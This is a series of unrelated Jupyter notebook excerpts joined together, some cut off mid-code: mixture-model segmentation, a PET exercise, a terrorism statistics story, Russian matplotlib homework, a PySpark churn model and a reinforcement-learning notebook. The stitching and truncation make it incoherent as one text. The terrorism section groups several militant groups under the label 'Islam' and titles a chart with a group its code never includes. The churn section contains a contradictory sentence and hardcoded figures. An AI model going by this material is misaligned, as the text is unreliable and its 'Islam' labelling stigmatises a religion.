sd=sds, observed=data) print("Random assignments: ", assignment.tag.test_value[:4], "...") print("Assigned center: ", center_i.tag.test_value[:4], "...") print("Assigned standard deviation: ", sd_i.tag.test_value[:4]) with model: trace = pm.sample(2500, tune=1000) import matplotlib as mpl plt.imshow(trace["assignment"][::50, np.argsort(data)], aspect=.4, alpha=.9) plt.xticks(np.arange(0, data.shape[0], 40), ["%.2f" % s for s in np.sort(data)[::40]]) plt.ylabel("posterior sample") plt.xlabel("value of $i$th data point") plt.title("Posterior labels of data points"); pm.traceplot(trace, varnames=['centers']) assign_trace = trace["assignment"] plt.scatter(data, assign_trace.mean(axis=0), c=assign_trace.mean(axis=0), s=50) plt.title("Probability of data point belonging to cluster 0") plt.ylabel("probability") plt.xlabel("value of data point"); # Use the predictions to segment the image. mask = 1 - assign_trace.mean(axis=0) mask=mask.reshape(24,24) plt.imshow(mask)PET imaging countsPET ( positron emission tomography) is a functional medical imaging technique relying on radioactive decay. In a usual PET test, a radioactive substance is introduced in the human body as a molecule whose destiny is known. For example, usually radioactive F18 molecules are used, so that metabolic activity, requiring glucose, can be traced.The raw data recorded by a PET are counts for each pixel for each time interval, but what is most interesting would be the average value of counts, so that area with stronger activity can be detected.In the figure below, that reports the total number of counts for each pixel of a dummy PET scan, you can spot a yellow area of high activity.# Ignore this with open('PET.txt', 'r') as f: pet=np.loadtxt(f,delimiter =',') pet_signal =np.array([np.random.poisson(pet) for i in range(1000)]) # Total number of counts plt.imshow(np.sum(pet_signal,axis=0))ExerciseTry to obtain the average counts for each pixel and try to segment the area of high activity using the techniques seen so farprint(signal) plt.imshow(np.average((signal),axis=0))[[[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] ... [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]] [[0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] ... [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0] [0 0 0 ... 0 0 0]]]Terrorism: looking beyond Western EuropeA data story by , , and . With the attacks in Paris still fresh in our minds, where on a Friday night in 2015, suicide bombers hit a concert hall; a major stadium; restaurants and bars, and left 130 people dead and hundreds wounded, our fear for terroristic attacks grew. However, with Paris already 4 years ago, and no new attacks this size, are these fears for a good reason? In Western Europe, terrorism is nothing new. From the seventies until the nineties it was an area of tension. These tensions were mainly caused by airplane hijackings, bombings and kidnapping due to the conflicts caused by the Cold War. After the war came to an end in 1991, the terrorist threat in Western Europe has significantly decreased.import pandas as pd import numpy as np from math import isnan from plotly.offline import init_notebook_mode, iplot import plotly.graph_objs as go # Start notebook mode init_notebook_mode(connected=True) pd.options.mode.chained_assignment = None def get_data(): raw_data = pd.read_csv('dataset.csv', encoding='ISO-8859-1', low_memory=False) selected_columns = raw_data[[ 'eventid', 'iyear', 'imonth', 'iday', 'country_txt', 'region_txt', 'gname', 'city', 'latitude', 'longitude', 'nkill', 'motive', 'nwound', 'nhostkid', 'success', 'natlty1_txt' ]] selected_columns['nwound'] = selected_columns['nwound'].fillna(0).astype(int) selected_columns['nkill'] = selected_columns['nkill'].fillna(0).astype(int) selected_columns['casualities'] = selected_columns['nkill'] + selected_columns['nwound'] selected_columns['amount'] = 1 return selected_columns data = get_data() data_eu = data[(data.region_txt == 'Western Europe')] data_eu = data_eu.groupby(['iyear']).sum().reset_index() data = data.groupby(['iyear']).sum().reset_index() data = [ go.Scatter( x = data_eu['iyear'], y = data_eu['amount'], name = 'Europe' ) ] layout = go.Layout(title = 'Terrorist attacks in Europe (1970-2017)', yaxis=go.layout.YAxis( title=go.layout.yaxis.Title( text='Amount of attacks')), xaxis=go.layout.XAxis( title=go.layout.xaxis.Title( text='Year')) ) fig = go.Figure(data = data, layout = layout) iplot(fig, filename = 'attacks-europe')However if you look beyond Western Europe, acts of terrorism have increased markedly across the globe. It is clearly visible that Western Europe does not have to cope with the same amount of attacks, that for example the Middle East, North Africa and South Asia have to deal with.data = get_data() data = data[data['casualities'] != 0] data = data[['region_txt','iyear','amount']] data = data.groupby(['region_txt','iyear']).sum().reset_index() data = data[data['iyear'] > 1999] data = [ go.Scatter( x= data[data['region_txt'] == 'Western Europe']['iyear'], y= data[data['region_txt'] == 'Western Europe']['amount'], name = 'Western Europe', line = dict( dash = 'dot') ), go.Scatter( x= data[data['region_txt'] == 'Eastern Europe']['iyear'], y= data[data['region_txt'] == 'Eastern Europe']['amount'], name = 'Eastern Europe' ), go.Scatter( x= data[data['region_txt'] == 'North America']['iyear'], y= data[data['region_txt'] == 'North America']['amount'], name = 'North America' ), go.Scatter( x= data[data['region_txt'] == 'South America']['iyear'], y= data[data['region_txt'] == 'South America']['amount'], name = 'South America' ), go.Scatter( x= data[data['region_txt'] == 'Sub-Saharan Africa']['iyear'], y= data[data['region_txt'] == 'Sub-Saharan Africa']['amount'], name = 'Sub-Saharan Africa' ), go.Scatter( x= data[data['region_txt'] == 'Australasia & Oceania']['iyear'], y= data[data['region_txt'] == 'Australasia & Oceania']['amount'], name = 'Australasia & Oceania' ), go.Scatter( x= data[data['region_txt'] == 'Central America & Caribbean']['iyear'], y= data[data['region_txt'] == 'Central America & Caribbean']['amount'], name = 'Central America & Caribbean' ), go.Scatter( x= data[data['region_txt'] == 'Southeast Asia']['iyear'], y= data[data['region_txt'] == 'Southeast Asia']['amount'], name = 'Southeast Asia' ), go.Scatter( x= data[data['region_txt'] == 'Middle East & North Africa']['iyear'], y= data[data['region_txt'] == 'Middle East & North Africa']['amount'], name = 'Middle East & North Africa' ), go.Scatter( x= data[data['region_txt'] == 'East Asia']['iyear'], y= data[data['region_txt'] == 'East Asia']['amount'], name = 'East Asia' ), go.Scatter( x= data[data['region_txt'] == 'South Asia']['iyear'], y= data[data['region_txt'] == 'South Asia']['amount'], name = 'South Asia' ), go.Scatter( x= data[data['region_txt'] == 'Central Asia']['iyear'], y= data[data['region_txt'] == 'Central Asia']['amount'], name = 'Central Asia', line = dict( dash = 'dot') ), ] layout = go.Layout( xaxis=dict( rangeslider=dict( visible = True ), type='date', title = 'Year' ), yaxis = go.layout.YAxis( title=go.layout.yaxis.Title( text='Amount of attacks') ), title = 'Amount of attacks per region (2000-2017)
Click legend to toggle traces' ) fig = go.Figure(data=data, layout = layout) iplot(fig)To substantiate the above information, the image about the percentage of terrorist attacks in the world per region over a timespan of 10 years, does not even show Western Europe in their top 5.def attacks_region_pie(): data = get_data() reg_count = {} for a in data.itertuples(): if a.iyear < 2001: continue if a.region_txt in reg_count: reg_count[a.region_txt] += 1 else: reg_count[a.region_txt] = 1 # initialize the 'other' category reg_count['Other Regions'] = 0 total_count = sum(reg_count.values()) should_restart = True while should_restart: should_restart = False for reg, count in reg_count.items(): if count / total_count < 0.05 and reg != 'Other Regions': reg_count['Other Regions'] += count del reg_count[reg] should_restart = True break c, r = zip(*sorted([(c, reg) for reg, c in reg_count.items()], reverse=True)) count = list(c) reg = list(r) fig = { 'data': [ { 'values': count, 'labels': reg, 'textposition': 'outside', 'textinfo': 'label+percent', 'hole': .65, 'type': 'pie' } ], 'layout': { 'title':'Percentage of terrorist attacks in the world per region (2001-2017)', 'showlegend': False, 'annotations': [ { "font": { "size": 20 }, "showarrow": False, "text": f'Total attacks
{sum(count)}' } ] } } iplot(fig) attacks_region_pie()In most parts of Europe, acts of terrorism is a relatively rare event and it is instead focused in particular countries or regions of instability. A major consequence of the rise of international terrorism has been the War on Terror. Since the attacks on the World Trade Center in New York in 2001, particularly Islamic extremist groups of Iraq and Afghanistan, as well as other operations in Yemen, Pakistan and Syria are in a rise (Roser, Nagdy, & Ritchie, 2013).def distribution(): df = get_data() df = df[df['iyear'] > 2000] df = df[df['gname'] != 'Unknown'] df = df.groupby(['gname']).sum().reset_index() df = df[['gname','casualities', 'amount']] df = df[df['amount'] > 0] df.loc[df.casualities < 7500, 'gname'] = 'Other' fig = { 'data': [ { 'values': df['casualities'], 'labels': df['gname'], 'textposition': 'outside', 'textinfo': 'label+percent', 'type': 'pie' } ], 'layout': { 'title':'Distribution of casualties by terrorist groups (2001-2017)', 'showlegend': False, } } iplot(fig) distribution()In the chart of distribution of casualties by terrorist groups, the Islamic State of Iraq and the Levant, better known as IS, together with Taliban, Al-Qaida and Boko Haram were accountable for the most casualties caused by terrorist attacks. In Western Europe, all of the major attacks since 2001 are carried out by the IS or Al-Qaida. The Boko Haram and the Taliban are active in other parts of the world. The Boko Haram is an extremist group from Nigeria and is accountable for a lot of attacks in the North of Africa. The Taliban is an Islamic terrorist organisation active in Afghanistan and Pakistan.import plotly.graph_objs as go df = get_data() df = df[(df.region_txt == 'Western Europe')] #| \ # (df.region_txt == 'Western Europe')] df = df[df['iyear'] > 2000] df = df[df['casualities'] > 0] df['text'] = df['city'] + ', ' + df['country_txt'] df_1 = df[(df.gname == '')] df_2 = df[(df.gname == 'Islamic State of Iraq and the Levant (ISIL)')] df_3 = df[(df.gname == 'Taliban')] df_4 = df[(df.gname == 'Al-Qaida')] df_5 = df[(df.gname == 'Jihadi-inspired extremists')] data = [ go.Scattergeo( lat = df_2['latitude'], lon = df_2['longitude'], text = df_2['text'].astype(str), name = 'Islamic State of Iraq and the Levant', marker = dict( color = 'blue', reversescale = True, opacity = 0.5, size = df_2['casualities'] / 12, sizemin = 3, ) ), go.Scattergeo( lat = df_1['latitude'], lon = df_1['longitude'], text = df_1['text'].astype(str), name = '', marker = dict( color = 'red', reversescale = True, opacity = 0.5, size = df_1['casualities'] / 12, sizemin = 3 ) ), go.Scattergeo( lat = df_3['latitude'], lon = df_3['longitude'], text = df_3['text'].astype(str), name = 'Taliban', marker = dict( color = 'green', reversescale = True, opacity = 0.5, size = df_3['casualities'] / 12, sizemin = 3 ) ), go.Scattergeo( lat = df_4['latitude'], lon = df_4['longitude'], text = df_4['text'].astype(str), name = 'Al-Qaida', marker = dict( color = 'green', reversescale = True, opacity = 0.5, size = df_4['casualities'] / 12, sizemin = 3 ) ) #, #go.Scattergeo( # lat = df_5['latitude'], # lon = df_5['longitude'], # text = df_5['text'].astype(str), # name = 'Jihadi-inspired extremists (red)', # marker = dict( # color = 'red', # reversescale = True, # opacity = 0.5, # size = df_5['casualities'] / 12, # sizemin = 3 # ) #) ] layout = dict( title = 'Terrorist attacks by the major organisations in Western Europe (2001-2017)', geo = dict( scope = 'europe', showland = True, landcolor = "rgb(212, 212, 212)", subunitcolor = "rgb(255, 255, 255)", countrycolor = "rgb(255, 255, 255)", showlakes = True, lakecolor = "rgb(255, 255, 255)", showsubunits = True, showcountries = True, resolution = 110, projection = dict( type = 'equirectangular' ))) fig = go.Figure(data=data, layout=layout ) iplot(fig)When in fact all of the major terrorist attacks in Western Europe since 2001 are caused by Islamic extremist groups, the threat in Western Europe is nothing compared to the rest of the world.data = get_data() data_eu = data[(data.region_txt == 'Western Europe')] data_eu = data_eu[data_eu['iyear'] > 1999] data = data[data['iyear'] > 1999] data.loc[data.gname == 'Taliban', 'gname'] = 'Islam' data.loc[data.gname == 'Al-Qaida', 'gname'] = 'Islam' data.loc[data.gname == '', 'gname'] = 'Islam' data.loc[data.gname == 'Islamic State of Iraq and the Levant (ISIL)', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == 'Taliban', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == 'Al-Qaida', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == '', 'gname'] = 'Islam' data_eu.loc[data_eu.gname == 'Islamic State of Iraq and the Levant (ISIL)', 'gname'] = 'Islam' data = data.groupby(['gname','iyear']).sum().reset_index() data_eu = data_eu.groupby(['gname','iyear']).sum().reset_index() data = [ go.Bar( x = data[data['gname'] == 'Islam']['iyear'], y = data[data['gname'] == 'Islam']['casualities'], name = 'World' ), go.Bar( x = data_eu[data_eu['gname'] == 'Islam']['iyear'], y = data_eu[data_eu['gname'] == 'Islam']['casualities'], name = 'Western Europe' ) ] layout = go.Layout(barmode = 'stack', title = 'Casualties by the 4 major Islamic organisations (ISIL, Taliban, Al-Qaida & Boko Haram)', yaxis=go.layout.YAxis( title=go.layout.yaxis.Title( text='Amount of casualties')), xaxis=go.layout.XAxis( title=go.layout.xaxis.Title( text='Year'))) fig = go.Figure(data = data, layout = layout) iplot(fig)Тема “Визуализация данных в Matplotlib”Задание 1Загрузите модуль pyplot библиотеки matplotlib с псевдонимом plt, а также библиотеку numpy с псевдонимом np.Примените магическую функцию %matplotlib inline для отображения графиков в Jupyter Notebook и настройки конфигурации ноутбука со значением 'svg' для более четкого отображения графиков.Создайте список под названием x с числами 1, 2, 3, 4, 5, 6, 7 и список y с числами 3.5, 3.8, 4.2, 4.5, 5, 5.5, 7.С помощью функции plot постройте график, соединяющий линиями точки с горизонтальными координатами из списка x и вертикальными - из списка y.Затем в следующей ячейке постройте диаграмму рассеяния (другие названия - диаграмма разброса, scatter plot).import matplotlib.pyplot as plt import numpy as np %matplotlib inline %config InlineBackend.figure_format = 'svg' x=[1, 2, 3, 4, 5, 6, 7] y=[3.5, 3.8, 4.2, 4.5, 5, 5.5, 7] plt.plot(x,y) plt.show() plt.scatter(x,y) plt.show()Задание 2С помощью функции linspace из библиотеки Numpy создайте массив t из 51 числа от 0 до 10 включительно.Создайте массив Numpy под названием f, содержащий косинусы элементов массива t.Постройте линейную диаграмму, используя массив t для координат по горизонтали,а массив f - для координат по вертикали. Линия графика должна быть зеленого цвета.Выведите название диаграммы - 'График f(t)'. Также добавьте названия для горизонтальной оси - 'Значения t' и для вертикальной - 'Значения f'.Ограничьте график по оси x значениями 0.5 и 9.5, а по оси y - значениями -2.5 и 2.5.t = np.linspace(0, 10, 51) # количество точек проверил, диапазоны верны f = np.cos(t) plt.plot(t,f, marker='o', color = "g") plt.title('График f(t)') plt.xlabel('Значения t') plt.ylabel('Значения f') plt.axis([0.5, 9.5, -2.5, 2.5]) plt.show()*Задание 3С помощью функции linspace библиотеки Numpy создайте массив x из 51 числа от -3 до 3 включительно.Создайте массивы y1, y2, y3, y4 по следующим формулам:y1 = x**2y2 = 2 * x + 0.5y3 = -3 * x - 1.5y4 = sin(x)Используя функцию subplots модуля matplotlib.pyplot, создайте объект matplotlib.figure.Figure с названием fig и массив объектов Axes под названием ax,причем так, чтобы у вас было 4 отдельных графика в сетке, состоящей из двух строк и двух столбцов. В каждом графике массив x используется для координат по горизонтали.В левом верхнем графике для координат по вертикали используйте y1,в правом верхнем - y2, в левом нижнем - y3, в правом нижнем - y4.Дайте название графикам: 'График y1', 'График y2' и т.д.Для графика в левом верхнем углу установите границы по оси x от -5 до 5.Установите размеры фигуры 8 дюймов по горизонтали и 6 дюймов по вертикали.Вертикальные и горизонтальные зазоры между графиками должны составлять 0.3.x = np.linspace (-3, 3, 51) y1 = x**2 y2 = 2 * x + 0.5 y3 = -3 * x - 1.5 y4 =np.sin(x) fig, ax = plt.subplots(2,2) ax1, ax2, ax3, ax4 = ax.flatten() ax1.plot(x, y1) ax2.plot(x, y2) ax3.plot(x, y3) ax4.plot(x, y4) ax1.set_title('График y1') ax2.set_title('График y2') ax3.set_title('График y3') ax4.set_title('График y4') ax1.set_xlim([-5,5]) fig.set_size_inches(8,6) plt.subplots_adjust(wspace=0.3, hspace=0.3)*Задание 4В этом задании мы будем работать с датасетом, в котором приведены данные по мошенничеству с кредитными данными: Credit Card Fraud Detection (информация об авторах: , , and . Calibrating Probability with Undersampling for Unbalanced Classification. In Symposium on Computational Intelligence and Data Mining (CIDM), IEEE, 2015).Ознакомьтесь с описанием и скачайте датасет creditcard.csv с сайта Kaggle.com по ссылке:https://www.kaggle.com/mlg-ulb/creditcardfraudДанный датасет является примером несбалансированных данных, так как мошеннические операции с картами встречаются реже обычных.Импортруйте библиотеку Pandas, а также используйте для графиков стиль “fivethirtyeight”.Посчитайте с помощью метода value_counts количество наблюдений для каждого значения целевой переменной Class и примените к полученным данным метод plot, чтобы построить столбчатую диаграмму. Затем постройте такую же диаграмму, используя логарифмический масштаб.На следующем графике постройте две гистограммы по значениям признака V1 - одну для мошеннических транзакций (Class равен 1) и другую - для обычных (Class равен 0). Подберите значение аргумента density так, чтобы по вертикали графика было расположено не число наблюдений, а плотность распределения. Число бинов должно равняться 20 для обеих гистограмм, а коэффициент alpha сделайте равным 0.5, чтобы гистограммы были полупрозрачными и не загораживали друг друга. Создайте легенду с двумя значениями: “Class 0” и “Class 1”. Гистограмма обычных транзакций должна быть серого цвета, а мошеннических - красного. Горизонтальной оси дайте название “Class”.import pandas as pd dataset_path = 'creditcard.csv' # dataset_prepared_path = r'‪C:\Users\SidorenkoVA\Desktop\GB\creditcard_data_preparated.csv' df = pd.read_csv(dataset_path) df.head() plt.style.use('fivethirtyeight') class_vals = df['Class'].value_counts() class_vals classvals = df["Class"].value_counts() classvals.plot(kind="bar") plt.show()Sparkify Project WorkspaceThis workspace contains a tiny subset (128MB) of the full dataset available (12GB). The analysis will be the same, and some numbers are going to change, with the larger dataset.# import libraries from pyspark.sql import SparkSession from pyspark.sql import Window from pyspark.sql.functions import * from pyspark.sql.types import * from pyspark.ml.feature import StandardScaler, StringIndexer, VectorAssembler, OneHotEncoderEstimator from pyspark.ml.linalg import DenseVector, SparseVector from pyspark.ml import Pipeline from pyspark.ml.classification import LogisticRegression, RandomForestClassifier, GBTClassifier from pyspark.ml.tuning import CrossValidator, ParamGridBuilder from pyspark.ml.evaluation import RegressionEvaluator, MulticlassClassificationEvaluator, BinaryClassificationEvaluator from sklearn.metrics import classification_report, confusion_matrix import re import time import datetime import numpy as np import pandas as pd from matplotlib import pyplot as plt import seaborn as sns ! pip install user_agents from user_agents import parse import re %matplotlib inline # create a Spark session spark = SparkSession \ .builder \ .appName('Sparkify')\ .getOrCreate() # all the parameter of spark Context spark.sparkContext.getConf().getAll()Load and Clean DatasetIn this workspace, the mini-dataset file is `mini_sparkify_event_data.json`. We will load and clean the dataset using Spark, checking for invalid or missing data - for example, records without userids or sessionids.# load data event_data = "mini_sparkify_event_data.json" df = spark.read.json(event_data) # print first five rows df.head(5) df.printSchema() df.select('userId').dropDuplicates().sort('userId').show() # an empty space is found here def clean_data(df): ''' Drop invalid or missing data ''' df = df.dropna(how = 'any', subset = ['userId', 'sessionId']) df = df.filter(df['userId'] != '') return df df = clean_data(df) # checking for null values in columns df_null = df.agg(*[count(when(isnull(c), c)).alias(c) for c in df.columns]) df_null.show() df.filter(df.song.isNotNull()).select('page').dropDuplicates().show()+--------+ | page| +--------+ |NextSong| +--------+The columns: artist, length, and song are empty when the page is not 'NextSong'. These are not invalid data. Exploratory Data Analysis Define ChurnWe will create a column `Churn` to use as the label for our model. We will use the `Cancellation Confirmation` events to define your churn, which happen for both paid and free users.def create_label(df): ''' Create a column 'Churn' to use as the label for the model. ''' churned_users = df.where(df.page == 'Cancellation Confirmation').select('userId').distinct() churned_users_list = list(churned_users.select('userId').toPandas()['userId']) df = df.withColumn('Churn', df.userId.isin(churned_users_list)) return df df = create_label(df) df.groupby(df.Churn).agg(countDistinct('userId')).show() print('{0:.0%} of users have churned'.format(52/(52+173)))23% of users have churnedExplore DataHere we are going to perform exploratory data analysis to observe the behavior for users who stayed vs users who churned.# print the first five rows pd.DataFrame(df.take(5), columns=df.columns).head()User Analysis Gender and Churngender = df.groupby(df.Churn, df.gender).agg(countDistinct('userId')).toPandas() gender.sort_values(by='gender') print('{0:.0%} of female users have churned'.format(20/(20+84))) print('{0:.0%} of male users have churned'.format(32/(32+89))) gender.pivot(index='gender', columns='Churn', values = 'count(DISTINCT userId)').plot(kind='bar');Level and Churnlevel = df.groupby(df.Churn, df.level).agg(countDistinct('userId')).toPandas() level.sort_values(by='level') print('{0:.0%} of free level users have churned'.format(46/(46+149))) print('{0:.0%} of paid level users have churned'.format(36/(36+129))) level.pivot(index='level', columns='Churn', values = 'count(DISTINCT userId)').plot(kind='bar');Male users have higher proportion of churn, and Free users have higher proportion of churn than free users. ActivitiesActivitiy-related variables aggregated on churn.df.groupby(df.Churn, df.auth).agg(countDistinct('sessionId')).show() df.groupby(df.Churn).agg(avg('itemInSession')).show() df.groupby(df.Churn).agg(avg('length')).show() df.groupby(df.Churn, df.method).agg(countDistinct('sessionId')).show() page = df.groupby(df.page, df.Churn).agg(countDistinct('sessionId')).sort('page', 'Churn').toPandas() page.pivot(index='page', columns='Churn', values = 'count(DISTINCT sessionId)').plot(kind='bar', figsize=(20,3)); pagedf = page.groupby(['page', 'Churn'])['count(DISTINCT sessionId)'].sum() page_pcts = pagedf.groupby(level=0).apply(lambda x: 100 * x / float(x.sum())) page_pctsDifficult to have a clear interaction between visited page and churn.Atributes like Roll Avert, Submit Downgrade/Upgrade, Thumbs down, Upgrade seems to have stronger relationship with Churn than other page visits. Feature Engineering# Functions for feature engineering def int_label(df): df = df.withColumn('label', df['Churn'].cast(IntegerType())) return df def tenure(df): ''' Calculate tenure: the last interacted date - registration date ''' max_ts_df = df.groupBy('userId').agg(max('ts').alias('max_ts')) df = df.join(max_ts_df, on=['userId'], how = 'left') df = df.withColumn('tenure', ((df.max_ts-df.registration)/86400000).cast(IntegerType())) return df def state_variable(df): ''' Create State from location ''' get_state = udf(lambda x: x.split(',')[1]) df = df.withColumn('state', get_state(df.location)) return df def device_variables(df): get_browser = udf(lambda x: parse(x).browser.family) get_os = udf(lambda x: parse(x).os.family) get_device = udf(lambda x: parse(x).device.family) df = df.withColumn('browser', get_browser(df.userAgent)) df = df.withColumn('os', get_os(df.userAgent)) df = df.withColumn('device', get_device(df.userAgent)) return df def user_stats(df): ''' Create user level stats ''' w = Window.partitionBy(df.userId) df = df.withColumn('num_songs', approx_count_distinct(df.song).over(w)) df = df.withColumn('num_artists', approx_count_distinct(df.artist).over(w)) df = df.withColumn('avg_length', avg(df.length).over(w)) return df def page_variables(df): ''' Based on EDA, create variables indicating if a user visited specific pages In addition to the pages that show stronger relationship with churn, we will make variables for Add Friend and Add to Playlist page visits ''' RollAdvert = df.where(df.page == 'Roll Advert').select('userId').distinct() RollAdvert_list = list(RollAdvert.select('userId').toPandas()['userId']) df = df.withColumn('roll_advert', df.userId.isin(RollAdvert_list)) Downgrade = df.where(df.page == 'Submit Downgrade').select('userId').distinct() Downgrade_list = list(Downgrade.select('userId').toPandas()['userId']) df = df.withColumn('downgrade', df.userId.isin(Downgrade_list)) Upgrade = df.where(df.page == 'Submit Upgrade').select('userId').distinct() Upgrade_list = list(Upgrade.select('userId').toPandas()['userId']) df = df.withColumn('upgrade', df.userId.isin(Upgrade_list)) Thumbsdown = df.where(df.page == 'Thumbs Down').select('userId').distinct() Thumbsdown_list = list(Thumbsdown.select('userId').toPandas()['userId']) df = df.withColumn('thumbsdown', df.userId.isin(Thumbsdown_list)) AddFriend = df.where(df.page == 'Add Friend').select('userId').distinct() AddFriend_list = list(AddFriend.select('userId').toPandas()['userId']) df = df.withColumn('addfriend', df.userId.isin(AddFriend_list)) AddtoPlaylist = df.where(df.page == 'Add to Playlist').select('userId').distinct() AddtoPlaylist_list = list(AddtoPlaylist.select('userId').toPandas()['userId']) df = df.withColumn('addtoplaylist', df.userId.isin(AddtoPlaylist_list)) return df df = int_label(df) df = tenure(df) df = state_variable(df) df = device_variables(df) df = user_stats(df) df = page_variables(df) pd.DataFrame(df.take(5), columns=df.columns).head() def drop_columns(df): ''' Drop unnecessary columns before modeling ''' columns_to_drop = ['userId', 'artist', 'auth', 'firstName', 'itemInSession', 'lastName', 'length', 'location', 'method', 'page', 'registration', 'sessionId', 'song', 'status', 'ts', 'userAgent', 'max_ts', 'Churn'] df = df.drop(*columns_to_drop) return df df_model = drop_columns(df) pd.DataFrame(df_model.orderBy(rand()).take(5), columns=df_model.columns)ModelingHere we are going to split the full dataset into train, test, and validation sets. Then test out machine learning methods like logistic regresion, random forest classifier and gradient.boosted tree classifier. We are going to evaluate the accuracy of the various models, tuning parameters as necessary, and then we will determine the winning model based on test accuracy and report results on the validation set. Since the churned users are a fairly small subset, we will use F1 score as the metric to optimize.train, test = df_model.randomSplit([0.7, 0.3], seed=42) # get the dimensions of the data print(train.count(), len(train.columns)) print(test.count(), len(test.columns)) # String Indexer for OneHotEncoderEstimator SI_gender = StringIndexer(inputCol='gender', outputCol='gender_index') SI_level = StringIndexer(inputCol='level', outputCol='level_index') SI_state = StringIndexer(inputCol='state', outputCol='state_index') SI_browser = StringIndexer(inputCol='browser', outputCol='browser_index') SI_os = StringIndexer(inputCol='os', outputCol='os_index') SI_device= StringIndexer(inputCol='device', outputCol='device_index') # OneHotEncoderEstimator OHE = OneHotEncoderEstimator(inputCols=['gender_index', 'level_index', 'state_index', 'browser_index', 'os_index', 'device_index'], outputCols=['gender_OHE', 'level_OHE', 'state_OHE', 'browser_OHE', 'os_OHE', 'device_OHE']) # Create a vector of all numeric features for scaling num_assembler = VectorAssembler(inputCols=['tenure', 'num_songs', 'num_artists', 'avg_length'], outputCol='NumFeatures') # Standard scaler for numeric features scaler = StandardScaler(inputCol='NumFeatures', outputCol='ScaledNumFeatures', withStd=True) # Create a vector of all features for modeling feature_assembler = VectorAssembler(inputCols=['ScaledNumFeatures', 'gender_OHE', 'level_OHE', 'state_OHE', 'browser_OHE', 'os_OHE', 'device_OHE', 'roll_advert', 'downgrade', 'upgrade', 'thumbsdown', 'addfriend', 'addtoplaylist'], outputCol='features') # Logistic regresion model lr = LogisticRegression(featuresCol='features', labelCol='label') lr_pipeline = Pipeline(stages=[SI_gender, SI_level, SI_state, SI_browser, SI_os, SI_device, OHE, num_assembler, scaler, feature_assembler, lr]) # Random Forest Classifier model rf = RandomForestClassifier(featuresCol='features', labelCol='label') rf_pipeline = Pipeline(stages=[SI_gender, SI_level, SI_state, SI_browser, SI_os, SI_device, OHE, num_assembler, scaler, feature_assembler, rf]) # Gradient.Boosted tree classifier model gbt = GBTClassifier(featuresCol='features', labelCol='label') gbt_pipeline = Pipeline(stages=[SI_gender, SI_level, SI_state, SI_browser, SI_os, SI_device, OHE, num_assembler, scaler, feature_assembler, gbt]) # training models lr_model = lr_pipeline.fit(train) rf_model = rf_pipeline.fit(train) gbt_model = gbt_pipeline.fit(train) # obtain predictions lr_preds = lr_model.transform(test) rf_preds = rf_model.transform(test) gbt_preds = gbt_model.transform(test)Evaluation (F1 and Accuracy)my_eval = MulticlassClassificationEvaluator(labelCol = 'label') acc_eval = MulticlassClassificationEvaluator(metricName='accuracy') f1_eval = MulticlassClassificationEvaluator(metricName='f1') # Calculating metrics acc = acc_eval.evaluate(lr_preds) f1 = f1_eval.evaluate(lr_preds) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}') # Calculating metrics acc = acc_eval.evaluate(rf_preds) f1 = f1_eval.evaluate(rf_preds) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}') # Calculating metrics acc = acc_eval.evaluate(gbt_preds) f1 = f1_eval.evaluate(gbt_preds) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}') # Confusion matrix for gbt y_true = gbt_preds.select(['label']).collect() y_pred = gbt_preds.select(['prediction']).collect() print(classification_report(np.hstack(y_true),np.hstack(y_pred))) ax = plt.subplot() conf = confusion_matrix(y_true, y_pred) sns.heatmap(conf, annot=True, ax = ax, cmap='Blues', fmt='g') ax.set_xlabel('Predicted labels'); ax.set_ylabel('True labels'); ax.set_title('Confusion Matrix');Step 5. Code for Hyper Parameter Tunin# Set the Parameters grid gbt_paramGrid = (ParamGridBuilder() .addGrid(gbt.maxDepth, [3, 5]) .addGrid(gbt.maxBins, [15, 30]) .build()) gbt_cv = CrossValidator(estimator=gbt_pipeline, estimatorParamMaps=gbt_paramGrid, evaluator=my_eval, numFolds = 3, seed=42, parallelism=2) cvModel = gbt_cv.fit(train) cvResults = cvModel.transform(test) acc_eval = MulticlassClassificationEvaluator(metricName='accuracy') f1_eval = MulticlassClassificationEvaluator(metricName='f1') # Calculating metrics acc = acc_eval.evaluate(cvResults) f1 = f1_eval.evaluate(cvResults) print(f'Accuracy: {acc:<4.2%} F-1 Score: {f1:<4.3f}')Accuracy: 99.34% F-1 Score: 0.993Collaboration and Competition---In this notebook, you will learn how to use the Unity ML-Agents environment for the third project of the [Deep Reinforcement Learning Nanodegree](https://www.udacity.com/course/deep-reinforcement-learning-nanodegree--nd893) program. 1. Start the EnvironmentWe begin by importing the necessary packages. If the code cell below returns an error, please revisit the project instructions to double-check that you have installed [Unity ML-Agents](https://github.com/Unity-Technologies/ml-agents/blob/master/docs/Installation.md) and [NumPy](http://www.numpy.org/).from Unity_Env_Wrapper import TennisEnv from buffer import ReplayBuffer from maddpg import MADDPG import torch import numpy as np import os from collections import deque from ddpg import DDPGAgent import torch import torch.nn.functional as FEnvironments contain **_brains_** which are responsible for deciding the actions of their associated agents. Here we check for the first brain available, and set it as the default brain we will be controlling from Python.main_tennis() fig = plt.figure() ax = fig.add_subplot(111) plt.plot(np.arange(1, len(scores)+1), scores) plt.ylabel('Score') plt.xlabel('Episode #')Train and Test SplitIf 